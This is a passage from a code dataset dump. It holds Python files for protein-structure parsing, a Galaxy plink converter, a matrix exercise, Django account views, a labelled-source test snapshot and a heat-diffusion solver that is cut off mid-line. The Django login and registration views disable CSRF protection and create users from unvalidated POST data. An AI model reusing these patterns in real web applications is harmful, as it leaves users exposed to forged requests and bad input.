line\n resNum,resiType = (int(line.split()[8])- first_resi,line.split()[5])\n X = np.array(float(line.split()[10]))\n Y = np.array(float(line.split()[11]))\n Z = np.array(float(line.split()[12]))\n cord[(line.split()[-3].lower(),resNum,line.split()[-2].strip('\"'))] = [resiType,np.array([X,Y,Z])]\n\n Resi_map = {}\n pdb_seq0 = ''\n chain_resi = []\n cord_chain ={}\n\n return cord\n\n#get_cif_entirePDB('2zjr_y')\n\n\n","sub_path":"feature_generation/test/_get_impt_pdb_new_resln_module.py","file_name":"_get_impt_pdb_new_resln_module.py","file_ext":"py","file_size_in_byte":6227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"620868075","text":"# converter for ldreduced rgenetics datatype\n# used for grr and eigenstrat - shellfish if we get around to it\nfrom __future__ import print_function\n\nimport os\nimport subprocess\nimport sys\nimport tempfile\nimport time\n\nprog = \"pbed_ldreduced_converter.py\"\n\ngalhtmlprefix = \"\"\"\n\n\n\n\n\n\n\n\n\n
\n\"\"\"\n\nplinke = 'plink'\n\n\ndef timenow():\n \"\"\"return current time as a string\n \"\"\"\n return time.strftime('%d/%m/%Y %H:%M:%S', time.localtime(time.time()))\n\n\ndef pruneLD(plinktasks=[], cd='./', vclbase=[]):\n \"\"\"\n \"\"\"\n fplog, plog = tempfile.mkstemp()\n alog = []\n alog.append('## Rgenetics: http://rgenetics.org Galaxy Tools rgQC.py Plink pruneLD runner\\n')\n for task in plinktasks: # each is a list\n vcl = vclbase + task\n with open(plog, 'w') as sto:\n subprocess.check_call(vcl, stdout=sto, stderr=sto, cwd=cd)\n try:\n lplog = open(plog, 'r').readlines()\n lplog = [elem for elem in lplog if elem.find('Pruning SNP') == -1]\n alog += lplog\n alog.append('\\n')\n os.unlink(plog) # no longer needed\n except Exception:\n alog.append('### %s Strange - no std out from plink when running command line\\n%s\\n' % (timenow(), ' '.join(vcl)))\n return alog\n\n\ndef makeLDreduced(basename, infpath=None, outfpath=None, plinke='plink', forcerebuild=False, returnFname=False,\n winsize=\"60\", winmove=\"40\", r2thresh=\"0.1\"):\n \"\"\" not there so make and leave in output dir for post job hook to copy back into input extra files path for next time\n \"\"\"\n outbase = os.path.join(outfpath, basename)\n inbase = os.path.join(infpath)\n plinktasks = []\n vclbase = [plinke, '--noweb']\n plinktasks += [['--bfile', inbase, '--indep-pairwise %s %s %s' % (winsize, winmove, r2thresh), '--out %s' % outbase],\n ['--bfile', inbase, '--extract %s.prune.in --make-bed --out %s' % (outbase, outbase)]]\n vclbase = [plinke, '--noweb']\n pruneLD(plinktasks=plinktasks, cd=outfpath, vclbase=vclbase)\n\n\ndef main():\n \"\"\"\n need to work with rgenetics composite datatypes\n so in and out are html files with data in extrafiles path\n\n .. raw:: xml\n\n \n python '$__tool_directory__/pbed_ldreduced_converter.py' '$input1.extra_files_path/$input1.metadata.base_name' '$winsize' '$winmove' '$r2thresh'\n '$output1' '$output1.files_path' 'plink'\n \n \"\"\"\n nparm = 7\n if len(sys.argv) < nparm:\n sys.stderr.write('## %s called with %s - needs %d parameters \\n' % (prog, sys.argv, nparm))\n sys.exit(1)\n inpedfilepath = sys.argv[1]\n base_name = os.path.split(inpedfilepath)[-1]\n winsize = sys.argv[2]\n winmove = sys.argv[3]\n r2thresh = sys.argv[4]\n outhtmlname = sys.argv[5]\n outfilepath = sys.argv[6]\n try:\n os.makedirs(outfilepath)\n except Exception:\n pass\n plink = sys.argv[7]\n makeLDreduced(base_name, infpath=inpedfilepath, outfpath=outfilepath, plinke=plink, forcerebuild=False, returnFname=False,\n winsize=winsize, winmove=winmove, r2thresh=r2thresh)\n flist = os.listdir(outfilepath)\n with open(outhtmlname, 'w') as f:\n f.write(galhtmlprefix % prog)\n s1 = '## Rgenetics: http://rgenetics.org Galaxy Tools %s %s' % (prog, timenow()) # becomes info\n s2 = 'Input %s, winsize=%s, winmove=%s, r2thresh=%s' % (base_name, winsize, winmove, r2thresh)\n print('%s %s' % (s1, s2))\n f.write('
%s\\n%s\\n
    ' % (s1, s2))\n for i, data in enumerate(flist):\n f.write('
  1. %s
  2. \\n' % (os.path.split(data)[-1], os.path.split(data)[-1]))\n f.write(\"
\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"lib/galaxy/datatypes/converters/pbed_ldreduced_converter.py","file_name":"pbed_ldreduced_converter.py","file_ext":"py","file_size_in_byte":4259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"9102232","text":"from typing import List\nclass Solution:\n def rotate(self, matrix: List[List[int]]) -> None:\n \"\"\"\n Do not return anything, modify matrix in-place instead.\n \"\"\"\n n = len(matrix)\n # 水平翻转\n for i in range(n//2):\n for j in range(n):\n matrix[i][j],matrix[n-i-1][j] = matrix[n-i-1][j],matrix[i][j]\n\n # 斜角翻转\n for i in range(n):\n for j in range(i):\n matrix[i][j],matrix[j][i] = matrix[j][i],matrix[i][j]\n print(matrix)\n\ns = Solution()\nmatrix = [\n [1,2,3],\n [4,5,6],\n [7,8,9]\n]\nprint(s.rotate(matrix))","sub_path":"python/general/面试题 0107.py","file_name":"面试题 0107.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"43743418","text":"from django.shortcuts import render_to_response\nfrom django import forms\nfrom People.models import Person\nfrom Quotes.models import Quote\nfrom django.http import HttpResponseRedirect\nfrom django.contrib.auth.models import User, Group\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.template import RequestContext\nfrom django.utils.translation import gettext\nfrom django.utils import translation\nfrom django.contrib.sites.models import Site\nfrom News.models import Story, Announcement\nfrom django.core.cache import cache\nfrom django.views.decorators.cache import cache_control\n\nclass EmailForm(forms.Form):\n title = forms.CharField(max_length=50,\n widget=forms.TextInput(attrs={'size':'50'}))\n sender = forms.EmailField(max_length=30,\n widget=forms.TextInput(attrs={'size':'30'}))\n date = forms.DateTimeField()\n text = forms.CharField(widget=forms.Textarea(\n attrs={'rows':'6','cols':'75'}))\n\ngender_list = (('M', 'Male'), ('F', 'Female' ))\nclass NewUserForm(forms.Form):\n username = forms.CharField(max_length=30)\n password = forms.CharField(max_length=20, widget=forms.PasswordInput())\n first = forms.CharField(max_length=20)\n last = forms.CharField(max_length=20)\n gender = forms.ChoiceField(choices=gender_list)\n email = forms.EmailField(max_length=30)\n\nsiteLanguages = (('en', 'English'), ('de', 'German' ), ('es', 'Spanish'))\nclass LoginForm(forms.Form):\n username = forms.CharField(max_length=30)\n password = forms.CharField(max_length=20, widget=forms.PasswordInput())\n Language = forms.ChoiceField(choices=siteLanguages)\n quotes = forms.BooleanField(required=False)\n\n# Create your views here.\n\ndef contact_view(request):\n eForm = EmailForm()\n return render_to_response('home/contact_form.html', { 'eForm':eForm })\n\n@cache_control(private=True, max_age=600)\ndef home_view(request):\n rDict = {}\n pList = cache.get('PersonList')\n if pList == None:\n pList = Person.objects.all()\n cache.set('PersonList', pList, 600)\n rDict['pList'] = pList\n rDict['announceList'] = Announcement.on_site.all()\n\n currentSite = Site.objects.get_current()\n if (currentSite.domain == 'iFriends.test'):\n hpTemplate = 'home/homepage.html'\n rDict['quotes'] = Quote.objects.all()\n elif (currentSite.domain == 'iNews.test'):\n hpTemplate = 'home/newshomepage.html'\n rDict['storyList'] = Story.on_site.all()\n\n return render_to_response(hpTemplate, rDict,\n context_instance = RequestContext(request))\n\n@csrf_exempt\ndef create_user(request):\n class PersonForm(forms.ModelForm):\n class Meta:\n model = Person\n fields = '__all__'\n\n message = 'Create New User'\n uForm = NewUserForm()\n\n if request.method == 'POST':\n if request.POST['submit'] == 'Create':\n postDict = request.POST.copy()\n uForm = NewUserForm(postDict)\n #create User object\n user = User.objects.create_user(postDict['username'],\n postDict['email'],\n postDict['password'])\n user.last_name = postDict['last']\n user.first_name = postDict['first']\n user.groups.add(Group.objects.get(name='iFriends'))\n user.save()\n\n #Create a Person object\n perDict = {}\n perDict['name'] = \"%s %s\" % (postDict['first'], postDict['last'])\n perDict['email'] = postDict['email']\n perDict['gender'] = postDict['gender']\n perDict['favoriteURL'] = 'http://www.iFriends.org'\n perDict['desc'] = 'New User'\n perDict['userID'] = user.id\n pForm = PersonForm(perDict)\n if pForm.is_valid():\n try:\n p = pForm.save()\n return HttpResponseRedirect('/People/Info/%d/' % p.id)\n except:\n message = 'Database Error.'\n user.delete()\n else:\n message = 'Form Data Error'\n user.delete()\n\n return render_to_response('registration/create_user.html',{\n 'uForm': uForm,\n 'message': message })\n\n@csrf_exempt\ndef login_user(request, next= '/'):\n message = gettext('Login User')\n lForm = LoginForm()\n\n if request.method == 'GET':\n request.session.set_test_cookie()\n\n if request.GET.has_key('next'):\n next = request.GET['next']\n\n if request.method == 'POST':\n if request.session.test_cookie_worked():\n request.session.delete_test_cookie()\n\n if request.POST['submit'] == 'Login':\n postDict = request.POST.copy()\n lForm = LoginForm(postDict)\n if lForm.is_valid():\n uName = request.POST['username']\n uPass = request.POST['password']\n user = authenticate(username=uName, password=uPass)\n\n if 'quotes' in request.POST:\n request.session['show_quotes'] = True\n else:\n request.session['show_quotes'] = False\n\n if user is not None:\n if user.is_active:\n login(request, user)\n request.session[translation.LANGUAGE_SESSION_KEY] = request.POST['Language']\n return HttpResponseRedirect(next)\n else:\n message = 'Account Deactivated'\n\n else:\n message = 'Login Incorrect'\n else:\n message = \"Please enable cookies and try again.\"\n\n return render_to_response('registration/login.html',{\n 'lForm': lForm,\n 'message': message })\n\ndef logout_user(request):\n logout(request)\n return HttpResponseRedirect('/Login')\n\n","sub_path":"Home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"608208131","text":"# ----------------------------------------------------------------------------------------\n# assignment.py\n# ----------------------------------------------------------------------------------------\na = b # assignment\n # assignment_lhs_identifier:a\n # assignment_rhs_atom:b\n # single_assignment:a\n # whole_span:1\n\n# ----------------------------------------------------------------------------------------\n# collatz_print.py\n# ----------------------------------------------------------------------------------------\ndef print_collatz(n): # added_block_label (-> +7)\n # function:print_collatz (-> +7)\n # function_argument:n\n # function_argument_flavor:arg\n # function_returning_nothing:print_collatz (-> +7)\n # whole_span:8 (-> +7)\n while n != 1: # comparison_operator:NotEq\n # literal:1\n # loop:while (-> +5)\n # loop_with_late_exit:while (-> +5)\n # suggest_constant_definition\n # while (-> +5)\n print(n) # call_argument:n\n # external_free_call:print\n # free_call:print\n # free_call_without_result:print\n if n % 2 == 0: # added_label_on_line_4\n # binary_operator:Mod\n # comparison_operator:Eq\n # divisibility_test:2\n # if (-> +3)\n # if_test_atom:0\n # if_test_atom:2\n # if_test_atom:n\n # literal:0\n # literal:2\n # modulo_operator\n # verbose_conditional_assignment (-> +3)\n n = n // 2 # assignment:FloorDiv\n # assignment_lhs_identifier:n\n # assignment_rhs_atom:2\n # assignment_rhs_atom:n\n # if_then_branch\n # literal:2\n # single_assignment:n\n # suggest_augmented_assignment\n # update:n:2\n # update_by_assignment:n:2\n # update_by_assignment_with:FloorDiv\n # update_with:FloorDiv\n else: # unknown_label\n n = 3 * n + 1 # addition_operator\n # assignment:Add\n # assignment_lhs_identifier:n\n # assignment_rhs_atom:1\n # assignment_rhs_atom:3\n # assignment_rhs_atom:n\n # binary_operator:Add\n # binary_operator:Mult\n # if_else_branch\n # literal:1\n # literal:3\n # multiplication_operator\n # single_assignment:n\n # suggest_constant_definition\n # update:n:1\n # update:n:3\n # update_by_assignment:n:1\n # update_by_assignment:n:3\n # update_by_assignment_with:Add\n # update_with:Add\n print(n) # call_argument:n\n # external_free_call:print\n # free_call:print\n # free_call_without_result:print\n\n# ----------------------------------------------------------------------------------------\n# fizzbuzz.py\n# ----------------------------------------------------------------------------------------\nimport collatz_print # import_internally:collatz_print\n # import_module_internally:collatz_print\n # whole_span:10 (-> +9)\nfor i in range(1, 101): # call_argument:1\n # call_argument:101\n # external_free_call:range\n # for:i (-> +8)\n # for_range:1:101 (-> +8)\n # free_call:range\n # literal:1\n # literal:101\n # loop:for (-> +8)\n # loop_with_late_exit:for (-> +8)\n # range:1:101\n if i % 15 == 0: # binary_operator:Mod\n # comparison_operator:Eq\n # divisibility_test:15\n # if (-> +7)\n # if_test_atom:0\n # if_test_atom:15\n # if_test_atom:i\n # literal:0\n # literal:15\n # modulo_operator\n # suggest_constant_definition\n print(\"FizzBuzz\") # call_argument:\n # external_free_call:print\n # free_call:print\n # free_call_without_result:print\n # if_then_branch\n # literal:Str\n elif i % 3 == 0: # binary_operator:Mod\n # comparison_operator:Eq\n # divisibility_test:3\n # if (-> +5)\n # if_test_atom:0\n # if_test_atom:3\n # if_test_atom:i\n # literal:0\n # literal:3\n # modulo_operator\n # suggest_constant_definition\n print(\"Fizz\") # call_argument:\n # external_free_call:print\n # free_call:print\n # free_call_without_result:print\n # if_elif_branch\n # literal:Str\n elif i % 5 == 0: # binary_operator:Mod\n # comparison_operator:Eq\n # divisibility_test:5\n # if (-> +3)\n # if_test_atom:0\n # if_test_atom:5\n # if_test_atom:i\n # literal:0\n # literal:5\n # modulo_operator\n # suggest_constant_definition\n print(\"Buzz\") # call_argument:\n # external_free_call:print\n # free_call:print\n # free_call_without_result:print\n # if_elif_branch\n # literal:Str\n else: # \n print(i) # call_argument:i\n # external_free_call:print\n # free_call:print\n # free_call_without_result:print\n # if_else_branch\n\n# ----------------------------------------------------------------------------------------\n# is_even.py\n# ----------------------------------------------------------------------------------------\nimport fizzbuzz # import_internally:fizzbuzz\n # import_module_internally:fizzbuzz\n # whole_span:3 (-> +2)\ndef is_even(n): # function:is_even (-> +1)\n # function_argument:n\n # function_argument_flavor:arg\n # function_returning_something:is_even (-> +1)\n return n % 2 == 0 # binary_operator:Mod\n # comparison_operator:Eq\n # divisibility_test:2\n # literal:0\n # literal:2\n # modulo_operator\n # return\n","sub_path":"tests/snapshots/simple_labelled_sources.py","file_name":"simple_labelled_sources.py","file_ext":"py","file_size_in_byte":7421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"518294354","text":"# Author: Chase Chivers\n# Last updated: 3/18/20\n\nimport numpy as np\nimport time as _timer_\nfrom utility_funcs import *\nimport string, random, os\nfrom scipy import optimize\nfrom scipy.special import erf, erfc\n\nclass HeatSolver:\n\t\"\"\"\n\tSolves two-phase thermal diffusivity problem with a temperature-dependent thermal conductivity of ice in\n\ttwo-dimensions. Sources and sinks include latent heat of fusion and tidal heating\n\tOptions:\n\t\ttidalheat -- binary; turns on/off viscosity-dependent tidal heating from Mitri & Showman (2005), default = 0\n\t\tTtol -- convergence tolerance for temperature, default = 0.1 K\n\t\tphitol -- convergence tolerance for liquid fraction, default = 0.01\n\t\tlatentheat -- 1 : use Huber et al. (2008) enthalpy method (other options coming soon?)\n\t\tfreezestop -- binary; stop when intrusion is frozen, default = 0\n\n\tUsage:\n\t\tAssuming, model = IceSystem(...)\n\t\t- Turn on tidal heating component\n\t\t\tmodel.tidalheat = True\n\n\t\t- Change tolerances\n\t\t\tmodel.Ttol = 0.001\n\t\t\tmodel.phitol = 0.0001\n\t\t\tmodel.Stol = 0.0001\n\t\"\"\"\n\t# off and on options\n\ttidalheat = 0 # off/on tidalheating component\n\tTtol = 0.1 # temperature tolerance\n\tphitol = 0.01 # liquid fraction tolerance\n\tStol = 1 # salinity tolerance\n\tlatentheat = 1 # choose enthalpy method to use\n\tfreezestop = 0 # stop simulation upon total solidification of intrusion\n\tmodel_time = 0\n\n\tclass outputs:\n\t\t\"\"\"Class structure to help define and calculate desired outputs of a simulation.\"\"\"\n\n\t\tdef __init__(self):\n\t\t\tself.outputs.tmp_data_directory = ''\n\t\t\tself.outputs.tmp_data_file_name = ''\n\t\t\tself.outputs.transient_results = dict()\n\t\t\tself.outputs.output_frequency = 0\n\n\t\tdef choose(self, file_path='./tmp/', file_name='', all=False, T=False, phi=False, k=False, S=False, Q=False,\n\t\t h=False, r=False, freeze_fronts=False, percent_frozen=False, output_frequency=1000, output_list=[]):\n\t\t\t\"\"\"\n\t\t\tChoose which outputs to track with time. Each variable is updated at the chosen output frequency and is\n\t\t\treturned in the dictionary object outputs.transient_results.\n\t\t\tParameters:\n\t\t\t\toutput_frequency : integer\n\t\t\t\t\tthe frequency to report a transient result. Default is every 1000 time steps\n\t\t\t\toutput_list : list\n\t\t\t\t\tlist of strings for the outputs below. Generally used for simulation that had stopped (i.e. hit a\n\t\t\t\t\twall time) without desired\n\t\t\t\tall : bool\n\t\t\t\t\tturns on all outputs listed below\n\t\t\t\tT, phi, k, S, Q : bool\n\t\t\t\t\ttracks and returns an array of temperature, liquid fraction, volume averaged thermal conductivity,\n\t\t\t\t\tsalinity, and source/sink grids, respectively\n\t\t\t\th : bool\n\t\t\t\t\ttracks the height (thickness) of the liquid intrusion over time into a 1d array\n\t\t\t\tr : bool\n\t\t\t\t\ttracks the radius of the liquid portion over time into a 1d array\n\t\t\t\tfreeze_fronts : bool\n\t\t\t\t\ttracks the propagating freeze front at the top and bottom of the intrusion into a 1d array\n\t\t\t\tpercent_frozen : bool\n\t\t\t\t\ttracks and returns a 1d list of the percent of the original intrusion that is now ice\n\t\t\tUsage:\n\t\t\t\tOutput all options every 50 years\n\t\t\t\t\tmodel.outputs.choose(model, all=True, output_frequency=int(50 * model.constants.styr/model.dt))\n\n\t\t\t\tOutput only temperature grids and salinity at every time step\n\t\t\t\t\tmodel.outputs.choose(model, T=True, S=True, output_frequency=1)\n\t\t\t\t\t--or--\n\t\t\t\t\tmodel.outputs.choose(model, output_list=['T','S'], output_frequency=1);\n\t\t\t\"\"\"\n\t\t\tto_output = {'time': True, 'T': T, 'phi': phi, 'k': k, 'S': S, 'Q': Q, 'h': h, 'freeze fronts':\n\t\t\t\tfreeze_fronts, 'r': r, 'percent frozen': percent_frozen}\n\t\t\tif all:\n\t\t\t\tto_output = {key: True for key, value in to_output.items()}\n\n\t\t\tif len(output_list) != 0:\n\t\t\t\tto_output = {key: True for key in output_list}\n\t\t\t\tto_output['time'] = True\n\n\t\t\tself.outputs.transient_results = {key: [] for key in to_output if to_output[key] is True}\n\t\t\tself.outputs.outputs = self.outputs.transient_results.copy()\n\t\t\tself.outputs.tmp_data_directory = file_path\n\t\t\tself.outputs.tmp_data_file_name = file_name\n\t\t\tself.outputs.output_frequency = output_frequency\n\t\t\tself.outputs.tmp_data_file_name = 'tmp_data_runID' + ''.join(random.choice(string.digits) for _ in range(4))\n\n\t\tdef calculate_outputs(self, n):\n\t\t\t\"\"\"\n\t\t\tCalculates the output and appends it to the list for chosen outputs. See outputs.choose() for description\n\t\t\tof values calculated here.\n\t\t\tParameters:\n\t\t\t\tn : integer\n\t\t\t\t\tnth time step during simulation\n\t\t\tReturns:\n\t\t\t\tans : dictionary object\n\t\t\t\t\tdictionary object with chosen outputs as 1d numpy arrays\n\t\t\t\"\"\"\n\t\t\tans = {}\n\t\t\tfor key in self.outputs.outputs:\n\t\t\t\tif key == 'time':\n\t\t\t\t\tans[key] = self.model_time\n\t\t\t\tif key == 'percent frozen':\n\t\t\t\t\tans[key] = 1 - (self.phi[self.geom].sum()) / len(self.geom[1])\n\t\t\t\tif key == 'r':\n\t\t\t\t\ttmp = np.where(self.phi > 0)\n\t\t\t\t\tans[key] = self.dx * max(tmp[1])\n\t\t\t\t\tdel tmp\n\t\t\t\tif key == 'h':\n\t\t\t\t\ttmp = np.where(self.phi > 0)\n\t\t\t\t\tans[key] = (max(tmp[0]) - min(tmp[0])) * self.dz\n\t\t\t\t\tdel tmp\n\t\t\t\tif key == 'freeze fronts':\n\t\t\t\t\ttmp = np.where(self.phi > 0)\n\t\t\t\t\tans[key] = np.array([min(tmp[0]), max(tmp[0])]) * self.dz\n\t\t\t\t\tdel tmp\n\t\t\t\tif key == 'T':\n\t\t\t\t\tans[key] = self.T.copy()\n\t\t\t\tif key == 'S':\n\t\t\t\t\tans[key] = self.S.copy()\n\t\t\t\tif key == 'phi':\n\t\t\t\t\tans[key] = self.phi.copy()\n\t\t\t\tif key == 'k':\n\t\t\t\t\tans[key] = self.k.copy()\n\t\t\t\tif key == 'Q':\n\t\t\t\t\tans[key] = self.Q.copy()\n\t\t\treturn ans\n\n\t\tdef get_results(self, n):\n\t\t\t\"\"\"Calls outputs.calculate_outputs() then saves dictionary of results to file\"\"\"\n\t\t\tif n % self.outputs.output_frequency == 0:\n\t\t\t\tget = self.outputs.calculate_outputs(self, n)\n\t\t\t\tsave_data(get, self.outputs.tmp_data_file_name + '_n={}'.format(n), self.outputs.tmp_data_directory)\n\n\t\tdef get_all_data(self, del_files=True):\n\t\t\t\"\"\"Concatenates all saved outputs from outputs.get_results() and puts into a single dictionary object.\"\"\"\n\t\t\tcwd = os.getcwd() # find working directory\n\t\t\tos.chdir(self.outputs.tmp_data_directory) # change to directory where data is being stored\n\n\t\t\t# make a list of all results files in directory\n\t\t\tdata_list = nat_sort([data for data in os.listdir() if data.endswith('.pkl') and \\\n\t\t\t self.outputs.tmp_data_file_name in data])\n\t\t\t# copy dictionary of desired results\n\t\t\tans = self.outputs.transient_results.copy()\n\t\t\t# iterate over file list\n\t\t\tfor file in data_list:\n\t\t\t\ttmp_dict = load_data(file) # load file\n\t\t\t\tfor key in self.outputs.outputs: # iterate over desired outputs\n\t\t\t\t\tans[key].append(tmp_dict[key]) # add output from result n to final file\n\t\t\t\tdel tmp_dict\n\t\t\t\tif del_files: os.remove(file)\n\n\t\t\t# make everything a numpy array for easier manipulation\n\t\t\tans = {key: np.asarray(value) for key, value in ans.items()}\n\n\t\t\t# go back to working directory\n\t\t\tos.chdir(cwd)\n\t\t\treturn ans\n\n\tdef set_boundaryconditions(self, top=True, bottom=True, sides=True, **kwargs):\n\t\t\"\"\"\n\t\t\tSet boundary conditions for heat solver. A bunch of options are available in case they want to be tested\n\t\t\tor used.\n\t\t\ttop : bool, string\n\t\t\t\ttop boundary conditions.\n\t\t\t\tdefault: True = Dirichlet, Ttop = Tsurf chosen earlier\n\t\t\t\t'Flux': surface loses heat to a \"ghost cell\" of ice\n\t\t\t\t\t\ttemperature of ghost cell is based on the equilibrium temperature profile at the depth one\n\t\t\t\t\t\tspatial size \"above\" the domain,\n\t\t\t\t\t\ti.e.: T_(ghost_cell) = Tsurf * (Tbot/Tsurf) ** (-dz/Lz)\n\t\t\t\t\t\t\t\tfor Tsurf = 110 K, Tbot = 273.15, & Lz = 5 km => T_(ghost_cell) = 109.8 K\n\t\t\t\t'Radiative': surface loses heat beyond the \"background\" surface temperature through blackbody\n\t\t\t\t\t\t\tradiation to a vacuum using Stefan-Boltzmann Law.\n\t\t\t\t\t\t\tNote: The smaller the time step the better this will predict the surface warming. Larger\n\t\t\t\t\t\t\ttime steps make the surface gain heat too fast. This is especially important if upper\n\t\t\t\t\t\t\tdomain is cold and simulation is using temperature-dependent thermal conductivity.\n\n\t\t\tbottom: bool, string\n\t\t\t\tbottom boundary condition\n\t\t\t\tdefault, True: Dirichlet, Tbottom = Tbot chosen earlier\n\t\t\t\t'Flux' : bottom loses heat to a \"ghost cell\" of ice at a constant temperature\n\t\t\t\t\t\t temperature of ghost cell is based on equilibrium temperature profile at depth one spatial\n\t\t\t\t\t\t size below the domain\n\t\t\t\t\t\t i.e. T_(ghost_cell) = Tsurf * (Tbot/Tsurf) ** ((Lz+dz)/Lz)\n\t\t\t\t\t\t for Tsurf = 110 K, Tbot = 273.15, & Lz = 5 km => T_(ghost_cell) = 273.647 K\n\t\t\t\t\t\t-> this can be helpful for using a \"cheater\" vertical domain so as not to have to simulate a\n\t\t\t\t\t\twhole shell\n\t\t\t\t'FluxI', 'FluxW': bottom loses heat to a \"ghost cell\" of ice ('FluxI') or water ('FluxW') at a chosen\n\t\t\t\t\t\t\t\tconstant temperature\n\t\t\t\t\t\t\t\tex: model.set_boundaryconditions(bottom='FluxI', botT=260);\n\t\t\tsides: bool, string\n\t\t\t\tLeft and right boundary conditions\n\t\t\t\tTrue : Dirichlet boundary condition;\n\t\t\t\t\t\tTleft = Tright = Tedge (see init_T)\n\t\t\t\t\t\t* NOTE: must set up domain such that anomaly is far enough away to not interact with the\n\t\t\t\t\t\tedges of domain\n\t\t\t\t'NoFlux : a 'no flux' boundary condition\n\t\t\t\t\t\t\t-> boundaries are forced to be the same temperature as the adjacent cells in the domain\n\t\t\t\t'RFlux' : 'NoFlux' boundary condition on the left, with a flux boundary at T(z,x=Lx,t) = Tedge(z)\n\t\t\t\t\t\tthat is dL far away. Most useful when using the symmetry about x option.\n\t\t\t\t\t\tdL value must be chosen when using this option:\n\t\t\t\t\t\tex: model.set_boundaryconditions(sides='RFlux', dL=500e3)\n\t\t\"\"\"\n\n\t\tself.topBC = top\n\t\tif top == 'Radiative':\n\t\t\t# self.Std_Flux_in = (self.k_initial[0, 1:-1] + self.k_initial[1, 1:-1]) \\\n\t\t\t# * (self.T_initial[1, 1:-1] - self.T_initial[0,1:-1])\n\t\t\tself.std_set = 0\n\n\t\tself.botBC = bottom\n\t\tif bottom == 'FluxI' or bottom == 'FluxW':\n\t\t\ttry:\n\t\t\t\tself.botT = kwargs['botT']\n\t\t\texcept:\n\t\t\t\traise Exception('Bottom boundary condition temperature not chosen\\n\\t->ex: '\n\t\t\t\t 'model.set_boundaryconditions(bottom=\\'FluxI\\', botT=260);')\n\t\tself.sidesBC = sides\n\t\tif sides == 'RFlux':\n\t\t\ttry:\n\t\t\t\tself.dL = kwargs['dL']\n\t\t\texcept:\n\t\t\t\traise Exception('Length for right side flux not chosen\\n\\t->model.set_boundaryconditions('\n\t\t\t\t 'sides=\\'RFlux\\', dL=500e3)')\n\n\tdef update_salinity(self, phi_last):\n\t\t\"\"\"\n\t\tParameterization of salt advection and diffusion in the intrusion. See Chivers et al., 201X for full\n\t\tdescription of parameterization.\n\t\t\"\"\"\n\t\tif self.issalt:\n\t\t\tz_ni, x_ni = np.where((phi_last > 0) & (self.phi == 0)) # find where ice has just formed\n\t\t\twater = np.where(self.phi >= self.rejection_cutoff) # find cells that can accept rejected salts\n\t\t\tvol = water[1].shape[0] # calculate \"volume\" of water\n\t\t\t# rejected_salt = 0 # initialize amount of salt rejected, ppt\n\t\t\tself.wat_vol.append(self.phi.sum())\n\t\t\tself.removed_salt.append(0) # start catalogue of salt removed from system\n\t\t\tself.mass_removed.append(0)\n\t\t\tself.ppt_removed.append(0)\n\n\t\t\tif len(z_ni) > 0 and vol != 0: # iterate over cells where ice has just formed\n\t\t\t\tSn = self.S.copy()\n\t\t\t\tfor i in range(len(z_ni)):\n\t\t\t\t\t# save starting salinity in cell\n\t\t\t\t\tS_old = self.S[z_ni[i], x_ni[i]]\n\t\t\t\t\t# calculate thermal gradients across each cell\n\t\t\t\t\tif self.symmetric and x_ni[i] in [0, self.nx - 1]:\n\t\t\t\t\t\tdTx = 0\n\t\t\t\t\telse:\n\t\t\t\t\t\tdTx = abs(self.T[z_ni[i], x_ni[i] - 1] - self.T[z_ni[i], x_ni[i] + 1]) / (2 * self.dx)\n\t\t\t\t\tdTz = (self.T[z_ni[i] - 1, x_ni[i]] - self.T[z_ni[i] + 1, x_ni[i]]) / (2 * self.dz)\n\n\t\t\t\t\t# brine drainage parameterization:\n\t\t\t\t\t# bottom of intrusion -> no gravity-drainage, salt stays\n\t\t\t\t\tif dTz > 0:\n\t\t\t\t\t\tself.S[z_ni[i], x_ni[i]] = S_old\n\n\t\t\t\t\t# top of intrusion -> brine drains and rejects salt\n\t\t\t\t\telif dTz < 0:\n\t\t\t\t\t\t# dT = np.hypot(dTx, dTz) # gradient across the diagonal of the cell\n\t\t\t\t\t\t# dT = max(abs(dTx), abs(dTz)) # maximum value\n\t\t\t\t\t\t# dT = np.sqrt(dTx*abs(dTz)) # geometric mean\n\t\t\t\t\t\t# dT = 2/(1/dTx + 1/abs(dTz)) # harmonic mean\n\t\t\t\t\t\tdT = (dTx + abs(dTz)) / 2. # arithmetic mean\n\t\t\t\t\t\t# salt entrained in newly formed ice determined by Buffo et al., 2019 results. (See\n\t\t\t\t\t\t# IceSystem.entrain_salt() function)\n\t\t\t\t\t\tself.S[z_ni[i], x_ni[i]] = self.entrain_salt(dT, S_old, self.composition)\n\t\t\t\t\t\t# not all salt will be entrained in ice, some will be mixed back into\n\t\t\t\t\t# rejected_salt += S_old - self.S[z_ni[i], x_ni[i]]\n\n\t\t\t\t# assume the salt is well mixed into remaining liquid solution in time step dt\n\t\t\t\tself.S[water] = self.S[water] + (Sn.sum() - self.S.sum()) / vol\n\t\t\t\t'''\n\t\t\t\t# attempt at vectorizing the salt parameterization but it ends up being slower (?)\n\t\t\t\t# unless entrain_salt can be rewritten without the for-loop\n\n\t\t\t\tS_old = self.S.copy()\n\t\t\t\tdTz = (self.T[:-2,:] - self.T[2:,:]) / (2 * self.dz)\n\t\t\t\tdTx = abs(self.T[:,:-2] - self.T[:,2:]) / (2 * self.dx)\n\t\t\t\tgrad = (abs(dTx[z_ni, x_ni-1]) + abs(dTz[z_ni-1, x_ni])) / 2\n\t\t\t\tself.S[z_ni, x_ni] = self.entrain_salt(grad, self.S[z_ni, x_ni], self.composition)\n\n\t\t\t\t# do bottom parameterization\n\t\t\t\tnew_dTz = dTz[z_ni-1, x_ni]\n\t\t\t\tloc = np.where(new_dTz > 0)[0]\n\t\t\t\tself.S[z_ni[loc],x_ni[loc]] = S_old[z_ni[loc], x_ni[loc]]\n\n\t\t\t\tself.S[water] = self.S[water] + (S_old.sum() - self.S.sum()) / vol\n\t\t\t\t'''\n\t\t\t\t# remove salt from system if liquid is above the saturation 